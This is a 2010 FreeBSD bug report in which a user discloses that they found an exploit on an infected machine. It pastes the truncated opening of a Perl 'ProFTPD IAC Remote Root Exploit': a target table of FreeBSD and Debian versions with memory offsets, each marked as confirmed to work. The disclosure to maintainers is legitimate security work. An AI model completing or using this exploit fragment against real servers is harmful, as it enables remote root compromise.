misc/152100: found an exploit on freebsd, "known to work" , in an infected (linux) machine

Michel van Gruijthuijsen mistige at gmail.com
Wed Nov 10 09:20:09 UTC 2010


>Number:         152100
>Category:       misc
>Synopsis:       found an exploit on freebsd, "known to work" , in an infected (linux) machine
>Confidential:   no
>Severity:       critical
>Priority:       high
>Responsible:    freebsd-bugs
>State:          open
>Quarter:        
>Keywords:       
>Date-Required:
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Wed Nov 10 09:20:08 UTC 2010
>Closed-Date:
>Last-Modified:
>Originator:     Michel van Gruijthuijsen
>Release:        8.x is at least one of the targeted.
>Organization:
-
>Environment:
>Description:
#!/usr/bin/perl

# Exploit Title: ProFTPD IAC Remote Root Exploit
# Date: 7 November 2010
# Author: Kingcope

use IO::Socket;

$numtargets = 13;

@targets =
(
 # Plain Stack Smashing

 #Confirmed to work
 ["FreeBSD 8.1 i386, ProFTPD 1.3.3a Server (binary)",# PLATFORM SPEC
        "FreeBSD",      # OPERATING SYSTEM
        0,                      # EXPLOIT STYLE
        0xbfbfe000,     # OFFSET START
        0xbfbfff00,     # OFFSET END
        1029],          # ALIGN

 #Confirmed     to work
 ["FreeBSD 8.0/7.3/7.2 i386, ProFTPD 1.3.2a/e/c Server (binary)",
        "FreeBSD",
        0,
        0xbfbfe000,
        0xbfbfff00,
        1021],

 # Return into Libc

 #Confirmed to work
 ["Debian GNU/Linux 5.0, ProFTPD 1.3.2e Server (Plesk binary)",
        "Linux",
        1,                      # EXPLOIT STYLE
        0x0804CCD4,     # write(2) offset
        8189,           # ALIGN
        0],             # PADDING

[.....], I can send you the whole thing if you want.
>How-To-Repeat:
It's an exploit.
>Fix:


>Release-Note:
>Audit-Trail:
>Unformatted:


More information about the freebsd-bugs mailing list